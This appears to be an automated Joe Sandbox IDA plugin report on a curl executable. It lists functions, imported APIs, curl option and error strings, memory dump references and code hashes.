CURLOPT_FTP_CREATE_MISSING_DIRS, xrefs: 00409BF7
CURLOPT_HEADERFUNCTION, xrefs: 00409FB6
CURLOPT_SSLKEYTYPE, xrefs: 00409377
CURLOPT_READDATA, xrefs: 004086B8
CURLOPT_RESOLVE, xrefs: 0040A033
CURLOPT_MAIL_RCPT, xrefs: 00409F24
CURLOPT_MAIL_FROM, xrefs: 00409EE4
hF, xrefs: 0040974B
CURLOPT_TIMEOUT_MS, xrefs: 00408E11
:MFKF, xrefs: 00408FEF
CURLOPT_SSLCERTTYPE, xrefs: 004092FF
CURLOPT_MAXREDIRS, xrefs: 0040906A
Transient problem: %s Will retry in %ld seconds. %ld retries left., xrefs: 0040A254
failed to truncate, exiting, xrefs: 0040A34D
CURLOPT_TIMECONDITION, xrefs: 00409797
CURLOPT_CAINFO, xrefs: 00409408
CURLOPT_HEADERDATA, xrefs: 00409FF3
curl: Saved to filename '%s', xrefs: 0040A20A
CURLOPT_SSLKEY, xrefs: 0040933B
CURLOPT_MAX_SEND_SPEED_LARGE, xrefs: 004091F2
CURLOPT_TELNETOPTIONS, xrefs: 00409A17
CURLOPT_TRANSFERTEXT, xrefs: 00408CD4
CURLOPT_LOW_SPEED_LIMIT, xrefs: 00409174
CURLOPT_KRBLEVEL, xrefs: 004098BB
CURLOPT_FTP_ALTERNATIVE_TO_USER, xrefs: 00409E1C
CURLOPT_CRLFILE, xrefs: 00409488
CURLOPT_TIMEVALUE, xrefs: 004097CB
CURLOPT_LOGIN_OPTIONS, xrefs: 00408D21
CURLOPT_HTTPHEADER, xrefs: 00409036
CURLOPT_HEADER, xrefs: 004088B2
CURLOPT_POSTFIELDSIZE_LARGE, xrefs: 00408F41
CURLOPT_XOAUTH2_BEARER, xrefs: 004088F2
CURLOPT_DNS_SERVERS, xrefs: 00409923
CURLOPT_TCP_NODELAY, xrefs: 00408624
://, xrefs: 0040854A
CURLOPT_DNS_LOCAL_IP4, xrefs: 004099A3
CURLOPT_NOPROXY, xrefs: 00408AE9
CURLOPT_QUOTE, xrefs: 004095C0
CURLOPT_DNS_LOCAL_IP6, xrefs: 004099E3
CURLOPT_SSLENGINE, xrefs: 00409B87
CURLOPT_FAILONERROR, xrefs: 00408B27
CURLOPT_MAIL_AUTH, xrefs: 0040A156
CURLOPT_FTP_SSL_CCC, xrefs: 00409CDC
CURLOPT_CAPATH, xrefs: 00409448
', xrefs: 0040A14E
CURLOPT_TLSAUTH_PASSWORD, xrefs: 0040A0BA
CURLOPT_FTP_SKIP_PASV_IP, xrefs: 00409D91
CURLOPT_TLSAUTH_TYPE, xrefs: 0040A0FA
CURLOPT_REFERER, xrefs: 00408F7E
CURLOPT_SEEKDATA, xrefs: 0040873A
CURLOPT_PROXY, xrefs: 00408926, 00408A33
[%lu/%lu]: %s --> %s, xrefs: 004084FA
CURLOPT_COOKIEJAR, xrefs: 004096DF
CURLOPT_EGDSOCKET, xrefs: 00409A81
CURLOPT_IPRESOLVE, xrefs: 00409C6C
CURLOPT_URL, xrefs: 0040880C
CURLOPT_CONNECTTIMEOUT_MS, xrefs: 00409AC7
CURLOPT_PROXYUSERPWD, xrefs: 00408962
CURLOPT_CRLF, xrefs: 0040957F
CURLOPT_DIRLISTONLY, xrefs: 00408BAE
CURLOPT_COOKIEFILE, xrefs: 004096A2
CURLOPT_AUTOREFERER, xrefs: 00408FBC
CURLOPT_NOPROGRESS, xrefs: 0040884A
CURLOPT_NETRC, xrefs: 00408C66
CURLOPT_INFILESIZE_LARGE, xrefs: 004087C7
?, xrefs: 0040857A
<stdout>, xrefs: 004084ED
CURLOPT_ERRORBUFFER, xrefs: 00408DD6
CURLOPT_USERPWD, xrefs: 00408D55
CURLOPT_RANGE, xrefs: 00408D91
CURLOPT_FTP_FILEMETHOD, xrefs: 00409DD2
CURLOPT_APPEND, xrefs: 00408BF1
CURLOPT_UPLOAD, xrefs: 00408B6B
CURLOPT_SSL_VERIFYPEER, xrefs: 004094DF
CURLOPT_SSLENGINE_DEFAULT, xrefs: 00409BC1
Throwing away %I64d bytes, xrefs: 0040A2E5
CURLOPT_INTERFACE, xrefs: 0040987F
%s%c%s, xrefs: 00408592
CURLOPT_READFUNCTION, xrefs: 00408704
CURLOPT_RESUME_FROM_LARGE, xrefs: 0040928F
xkF, xrefs: 004089E3, 00408A5F
CURLOPT_CUSTOMREQUEST, xrefs: 00409807
CURLOPT_SSLVERSION, xrefs: 0040975B
CURLOPT_SSL_CIPHER_LIST, xrefs: 00409B23
CURLOPT_SSL_VERIFYHOST, xrefs: 00409515
CURLOPT_STDERR, xrefs: 00409843
CURLOPT_POSTFIELDS, xrefs: 00408F05
CURLOPT_LOW_SPEED_TIME, xrefs: 004091B0
CURLOPT_POSTQUOTE, xrefs: 004095F4
CURLOPT_DNS_INTERFACE, xrefs: 00409963
CURLOPT_IGNORE_CONTENT_LENGTH, xrefs: 00409D4E
CURLOPT_PROXYTYPE, xrefs: 004089F3, 00408A6F
CURLOPT_POSTREDIR, xrefs: 004090EE
CURLOPT_SSLCERT, xrefs: 004092C3
CURLOPT_UNRESTRICTED_AUTH, xrefs: 00408EB3
CURLOPT_USERAGENT, xrefs: 00408FFA
CURLOPT_FOLLOWLOCATION, xrefs: 00408E70
CURLOPT_COOKIESESSION, xrefs: 00409712
CURLOPT_NETRC_FILE, xrefs: 00408C9E
CURLOPT_TCP_KEEPALIVE, xrefs: 00409E88
CURLOPT_TLSAUTH_USERNAME, xrefs: 0040A07A
CURLOPT_PREQUOTE, xrefs: 00409628

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: free$curl_mfprintf$curl_easy_getinfocurl_easy_setopt$_fileno$_errnocurl_msnprintfstrerror$_isatty_utimecurl_easy_performcurl_easy_strerrorcurl_freecurl_getenvcurl_maprintfcurl_mprintffclosefflushfputcioctlsocketstrchrstrcmpstrlenstrrchrstrstrstrtol
String ID: [%lu/%lu]: %s --> %s$%s%c%s$:MFKF$://$<stdout>$?$CURLOPT_APPEND$CURLOPT_AUTOREFERER$CURLOPT_CAINFO$CURLOPT_CAPATH$CURLOPT_CONNECTTIMEOUT_MS$CURLOPT_COOKIE$CURLOPT_COOKIEFILE$CURLOPT_COOKIEJAR$CURLOPT_COOKIESESSION$CURLOPT_CRLF$CURLOPT_CRLFILE$CURLOPT_CUSTOMREQUEST$CURLOPT_DIRLISTONLY$CURLOPT_DNS_INTERFACE$CURLOPT_DNS_LOCAL_IP4$CURLOPT_DNS_LOCAL_IP6$CURLOPT_DNS_SERVERS$CURLOPT_EGDSOCKET$CURLOPT_ERRORBUFFER$CURLOPT_FAILONERROR$CURLOPT_FOLLOWLOCATION$CURLOPT_FTPPORT$CURLOPT_FTP_ACCOUNT$CURLOPT_FTP_ALTERNATIVE_TO_USER$CURLOPT_FTP_CREATE_MISSING_DIRS$CURLOPT_FTP_FILEMETHOD$CURLOPT_FTP_SKIP_PASV_IP$CURLOPT_FTP_SSL_CCC$CURLOPT_HEADER$CURLOPT_HEADERDATA$CURLOPT_HEADERFUNCTION$CURLOPT_HTTPHEADER$CURLOPT_HTTPPROXYTUNNEL$CURLOPT_IGNORE_CONTENT_LENGTH$CURLOPT_INFILESIZE_LARGE$CURLOPT_INTERFACE$CURLOPT_IPRESOLVE$CURLOPT_KEYPASSWD$CURLOPT_KRBLEVEL$CURLOPT_LOGIN_OPTIONS$CURLOPT_LOW_SPEED_LIMIT$CURLOPT_LOW_SPEED_TIME$CURLOPT_MAIL_AUTH$CURLOPT_MAIL_FROM$CURLOPT_MAIL_RCPT$CURLOPT_MAXREDIRS$CURLOPT_MAX_RECV_SPEED_LARGE$CURLOPT_MAX_SEND_SPEED_LARGE$CURLOPT_NETRC$CURLOPT_NETRC_FILE$CURLOPT_NOPROGRESS$CURLOPT_NOPROXY$CURLOPT_POSTFIELDS$CURLOPT_POSTFIELDSIZE_LARGE$CURLOPT_POSTQUOTE$CURLOPT_POSTREDIR$CURLOPT_PREQUOTE$CURLOPT_PROXY$CURLOPT_PROXYTYPE$CURLOPT_PROXYUSERPWD$CURLOPT_QUOTE$CURLOPT_RANDOM_FILE$CURLOPT_RANGE$CURLOPT_READDATA$CURLOPT_READFUNCTION$CURLOPT_REFERER$CURLOPT_RESOLVE$CURLOPT_RESUME_FROM_LARGE$CURLOPT_SEEKDATA$CURLOPT_SEEKFUNCTION$CURLOPT_SSLCERT$CURLOPT_SSLCERTTYPE$CURLOPT_SSLENGINE$CURLOPT_SSLENGINE_DEFAULT$CURLOPT_SSLKEY$CURLOPT_SSLKEYTYPE$CURLOPT_SSLVERSION$CURLOPT_SSL_CIPHER_LIST$CURLOPT_SSL_VERIFYHOST$CURLOPT_SSL_VERIFYPEER$CURLOPT_STDERR$CURLOPT_TCP_KEEPALIVE$CURLOPT_TCP_NODELAY$CURLOPT_TELNETOPTIONS$CURLOPT_TIMECONDITION$CURLOPT_TIMEOUT_MS$CURLOPT_TIMEVALUE$CURLOPT_TLSAUTH_PASSWORD$CURLOPT_TLSAUTH_TYPE$CURLOPT_TLSAUTH_USERNAME$CURLOPT_TRANSFERTEXT$CURLOPT_UNRESTRICTED_AUTH$CURLOPT_UPLOAD$CURLOPT_URL$CURLOPT_USERAGENT$CURLOPT_USERPWD$CURLOPT_WRITEDATA$CURLOPT_XOAUTH2_BEARER$Throwing away %I64d bytes$Transient problem: %s Will retry in %ld seconds. %ld retries left.$V'$`hF$curl: Saved to filename '%s'$failed to truncate, exiting$fcntl failed on fd=%d: %s$xkF$'$gF$hF
API String ID: 2469179215-3212702910
Opcode ID: 951f1d2465136b9e52b36b1c7ce0d32acf660de1248f96ea53aab04f37a9bfd7
Instruction ID: cb66f48e45f416670c5ebaf7369fddbeb922b4d37d728f2bcf52b64aed604754
Opcode Fuzzy Hash: 951f1d2465136b9e52b36b1c7ce0d32acf660de1248f96ea53aab04f37a9bfd7
Instruction Fuzzy Hash: D113C7B1A093419FD760DF6AC54475FBBE0AF84748F01896EE8989B380E778D944CB87

Function 0040C670 Relevance: 61.7, APIs: 28, Strings: 7, Instructions: 494
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strlen.MSVCRT ref: 0040C6A3
free.MSVCRT ref: 0040C6BD
fgets.MSVCRT ref: 0040C7DD
_strdup.MSVCRT ref: 0040C7FD
fclose.MSVCRT ref: 0040C81B

Strings

%s%s, xrefs: 0040CDC0
%s:%d: warning: '%s' uses unquoted white space in the line that may cause side-effects!, xrefs: 0040C9A0
\, xrefs: 0040CD4A
%s:%d: warning: '%s' %s, xrefs: 0040CB61
_curlrc, xrefs: 0040C6B3, 0040CC7B, 0040CCBE, 0040CDB0
%s%s%s, xrefs: 0040CCD2
<stdin>, xrefs: 0040CB44

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: _strdupfclosefgetsfreestrlen
String ID: %s%s$%s%s%s$%s:%d: warning: '%s' %s$%s:%d: warning: '%s' uses unquoted white space in the line that may cause side-effects!$<stdin>$\$_curlrc
API String ID: 317961273-2735849793
Opcode ID: 2f9650e10ed172a2b95ebace590a98aa69a12bffe9a6af095c1475190411b3e6
Instruction ID: 86a0fd9f2d06d8ad12e843f8711a017b8d55794ad73e8f0c442d102f5f61359a
Opcode Fuzzy Hash: 2f9650e10ed172a2b95ebace590a98aa69a12bffe9a6af095c1475190411b3e6
Instruction Fuzzy Hash: 15127FB1A04315CBDB209F25C4C43AABBE1AF45344F0486BFE899A7381D77C9D858F99

Function 0040F0A0 Relevance: 28.9, APIs: 7, Strings: 9, Instructions: 875COMMON

Download Yara Rule

Strings

-, xrefs: 0040F550
I64, xrefs: 0040F3E5
I32, xrefs: 0040F3D5
%, xrefs: 0040F4B6
.%ld, xrefs: 0040F5C4
%ld, xrefs: 0040F596
@, xrefs: 0040F454
0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 0040F153, 0040F71A, 00410332
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 0040F712, 00410170

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID:
String ID: %$%ld$-$.%ld$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz$@$I32$I64
API String ID: 0-2377459892
Opcode ID: d45006ad82b729ec81cc2d65c7bf4d9ac085d7054c02067bc1d35c618f6e8918
Instruction ID: 88e82e47560baaaeaf7028eef197ccf06a49adf522e3715aa1b72b52795194f3
Opcode Fuzzy Hash: d45006ad82b729ec81cc2d65c7bf4d9ac085d7054c02067bc1d35c618f6e8918
Instruction Fuzzy Hash: 25726071508341CFC720CF28C48475ABBE1BF85324F194A7EE8D5AB791D379D98A8B46

Function 0040F493 Relevance: 24.8, APIs: 5, Strings: 9, Instructions: 323COMMON

Download Yara Rule

Strings

-, xrefs: 0040F550
I64, xrefs: 0040F3E5
I32, xrefs: 0040F3D5
%, xrefs: 0040F4B6
, xrefs: 0040FA50
.%ld, xrefs: 0040F5C4
%ld, xrefs: 0040F596
0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 0040F71A
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 0040F712

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID:
String ID: $%$%ld$-$.%ld$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz$I32$I64
API String ID: 0-3673882079
Opcode ID: 903db924d2db57e22826b0566fab0a23a8655441afa4f6c4cdd12d35eef099ab
Instruction ID: 2de93c18827c86eebcc75dfb806d0953b8fd1cccc9387d1883af4d764620baba
Opcode Fuzzy Hash: 903db924d2db57e22826b0566fab0a23a8655441afa4f6c4cdd12d35eef099ab
Instruction Fuzzy Hash: E1D16B716083418FD720CF18C48475AFBE1AF94354F19897EE8D8A7392D379E9898B86

Function 00402470 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 144
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fwrite.MSVCRT ref: 004024B6
fopen.MSVCRT ref: 00402520
fclose.MSVCRT ref: 0040253A
strerror.MSVCRT ref: 00402546
curl_easy_pause.CURL ref: 004025AC

Strings

Failed to create the file %s: %s, xrefs: 0040266C
Remote filename has no length!, xrefs: 004025D5
Refusing to overwrite %s: %s, xrefs: 00402551

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_easy_pausefclosefopenfwritestrerror
String ID: Failed to create the file %s: %s$Refusing to overwrite %s: %s$Remote filename has no length!
API String ID: 1673567693-2765071892
Opcode ID: 39485849cafebc983fc95a3ff2f68d1eca04dc9a257143ec358d98f1e6e3439d
Instruction ID: 55db24a250ed0e60a979d8ac7e06613e62a30fcaa9fc80d4953d6130090cb282
Opcode Fuzzy Hash: 39485849cafebc983fc95a3ff2f68d1eca04dc9a257143ec358d98f1e6e3439d
Instruction Fuzzy Hash: 505142706087019FD724DF69D58425BFBE0BF94358F14893EE88887391E7B9D884CB5A

Function 00414BF0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 133
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getpeername.WS2_32 ref: 00414C3C
WSAGetLastError.WS2_32 ref: 00414C4D

Part of subcall function 00413810: GetLastError.KERNEL32 ref: 00413822
Part of subcall function 00413810: strrchr.MSVCRT ref: 00413941
Part of subcall function 00413810: strrchr.MSVCRT ref: 00413961
Part of subcall function 00413810: GetLastError.KERNEL32 ref: 00413975
Part of subcall function 00413810: SetLastError.KERNEL32 ref: 00413981
Part of subcall function 00413810: FormatMessageA.KERNEL32 ref: 00413B3C
Part of subcall function 00413810: curl_msnprintf.CURL ref: 00413B68

Part of subcall function 004166C0: curl_mvsnprintf.CURL(?,?,?,?,?,?,?,?,0041AB91), ref: 004166EA
Part of subcall function 004166C0: strlen.MSVCRT ref: 00416710

getsockname.WS2_32 ref: 00414D21
GetLastError.KERNEL32 ref: 00414D4F
WSAGetLastError.WS2_32 ref: 00414D80
GetLastError.KERNEL32 ref: 00414DB4

Part of subcall function 00413810: strncpy.MSVCRT ref: 00413AF6

Part of subcall function 004166C0: curl_msnprintf.CURL(?,?,?,?,?,?,?,?,0041AB91), ref: 0041676E

Strings

ssloc inet_ntop() failed with errno %d: %s, xrefs: 00414DCC
ssrem inet_ntop() failed with errno %d: %s, xrefs: 00414D67
getpeername() failed with errno %d: %s, xrefs: 00414C65
getsockname() failed with errno %d: %s, xrefs: 00414D9B

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ErrorLast$curl_msnprintfstrrchr$FormatMessagecurl_mvsnprintfgetpeernamegetsocknamestrlenstrncpy
String ID: getpeername() failed with errno %d: %s$getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
API String ID: 1686978045-670633250
Opcode ID: 4a7fcebe0d5b511c74acc3c2c75d150c2fa594421d7b3765557d794b56f35c0c
Instruction ID: dcc935663f5dea96790d9dab5aa152592397294b3ff500ea45394c570a89305c
Opcode Fuzzy Hash: 4a7fcebe0d5b511c74acc3c2c75d150c2fa594421d7b3765557d794b56f35c0c
Instruction Fuzzy Hash: 5B51C1B09057059FCB00EF2AD58469ABBF4FF88314F11C96EE8888B315E7349985CF96

Function 0040C889 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

isspace.MSVCRT ref: 0040C8D2
isspace.MSVCRT ref: 0040C90C
isspace.MSVCRT ref: 0040C974
free.MSVCRT ref: 0040CA31
free.MSVCRT ref: 0040CA39

Strings

%s:%d: warning: '%s' uses unquoted white space in the line that may cause side-effects!, xrefs: 0040C9A0

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: isspace$free
String ID: %s:%d: warning: '%s' uses unquoted white space in the line that may cause side-effects!
API String ID: 3795756782-2290672920
Opcode ID: 7b59c2a2604bf41766f1e72bf9adc7447a6d6e3d51cd946c519651625c927992
Instruction ID: 390cc15c4eedf6505c01eaf2c0df7d36fd693f931d3bb62208b177338d958f03
Opcode Fuzzy Hash: 7b59c2a2604bf41766f1e72bf9adc7447a6d6e3d51cd946c519651625c927992
Instruction Fuzzy Hash: 5D510EB5A14325CBCB209F2984C429AB7E4AB04340F4445BFE898E7381E37C9E958F59

Function 00413FB0 Relevance: 15.3, APIs: 10, Instructions: 299
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 004143E0

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 76796298e2c5232b4fc090fd9e47e3a6aabca84325a330ffc91bafc9c4c9aa36
Instruction ID: 33681c5b42db24fdb4801192dea4bf37566ea1da609f01560879d9c1cd40d3cc
Opcode Fuzzy Hash: 76796298e2c5232b4fc090fd9e47e3a6aabca84325a330ffc91bafc9c4c9aa36
Instruction Fuzzy Hash: 84C13B71A002198BCB24DF29C8847DEB7F5BB88315F1486AAE92D97380E734DAC5CF45

Function 00415D60 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 249
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASetLastError.WS2_32 ref: 00415E4D

Strings

., xrefs: 00415E59
L', xrefs: 00416077
connect to %s port %ld failed: %s, xrefs: 00415E8F
After %ldms connect time, move on!, xrefs: 00416067
Connection failed, xrefs: 00416048
Connection time-out, xrefs: 00415F63
Failed to connect to %s port %ld: %s, xrefs: 00415F25

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ErrorLast
String ID: .$After %ldms connect time, move on!$Connection failed$Connection time-out$Failed to connect to %s port %ld: %s$L'$connect to %s port %ld failed: %s
API String ID: 1452528299-2312630996
Opcode ID: 462fc10055488b752809fcddc0e709a09dbb4d121823b4d12ffc95ee45a3a6d5
Instruction ID: bdc616c2b42f6195fc6d1b26f2a5e5d32bca32430617f0f8fe946a10070863f5
Opcode Fuzzy Hash: 462fc10055488b752809fcddc0e709a09dbb4d121823b4d12ffc95ee45a3a6d5
Instruction Fuzzy Hash: E9B1D174A04704DFCB10DFA9C5846DEBBF1BF88314F11892EE8589B355E738E9858B46

Function 0040C95C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fgets.MSVCRT ref: 0040C7DD
_strdup.MSVCRT ref: 0040C7FD
fclose.MSVCRT ref: 0040C81B
isspace.MSVCRT ref: 0040C974
free.MSVCRT ref: 0040CA31
free.MSVCRT ref: 0040CA39
free.MSVCRT ref: 0040CA4C

Strings

%s:%d: warning: '%s' uses unquoted white space in the line that may cause side-effects!, xrefs: 0040C9A0

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

